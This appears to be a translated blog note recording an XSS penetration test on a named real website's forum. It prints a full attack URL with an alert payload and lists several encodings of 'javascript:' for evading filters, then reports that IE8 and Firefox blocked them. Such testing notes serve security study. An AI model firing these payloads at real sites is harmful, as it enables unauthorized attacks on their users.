Tool: AppScan
Site: www.talk915.com
Browser: Ie8,firefox
Method: Insert
With the AppScan scan results, select
To spell the test script in the AppScan as a URL:
http://www.talk915.com/forum/forum_community.action?struts.token.name=token&token= G2tqixrnk8p5zd8ynr6a2yhst2p0ju7w&title=&author=&content=&titles=&titletype=&forumid= &orderBy=&excellent=&selectTitle=&page.currentPage=1&postForumId=&postContent=& Postadd=&postid=&oldforumid=&openpost=&postaudio=&postaudiolength=&poststatus=&img _url_length=64&expression_url_length=46&upload_url=http%3a%2f%2fwww.talk915.com%3a13148% 2fresourceproxy%2ffdfsupload&download_url=http%3a%2f%2fwww.talk915.com%3a13148%2fresourceproxy% 2ffdfsdownload%3ffile_id%3d&pathurl=http%3a%2f%2fwww.talk915.com%3a80%2f&usertoken=&searchwhere= 1234> "' >%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26% 23x69;%26%23x70;%26%23x74;%26%23x3a; Alert (56165) >&forumlistid=4&selectforumid=1&posttitle=1234
Whether you're putting the above
%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;
Change into
Javascript:
Or
%6a%61%76%61%73%63%72%69%70%74%3a
Or
& #x6a & #x61 & #x76 & #x61 & #x73 & #x63 & #x72 & #x69 & #x70 & #x74 & #x3a
Or
& #x006a & #x0061 & #x0076 & #x0061 & #x0073 & #x0063 & #x0072 & #x0069 & #x0070 & #x0074 & #x003a
Input the above URL into the address bar, the response of each browser
IE8:
Firefox
Does not make any prompts and does not perform the specified action.
And the reason for this phenomenon is that
http://hi.baidu.com/yushangren/item/ed6702819ccdb02b100ef38d
That is to say, IE8 and Firefox all make a regular match to the various URL coding rules of JavaScript, and thus play a blocking role.
XSS penetration Test (1)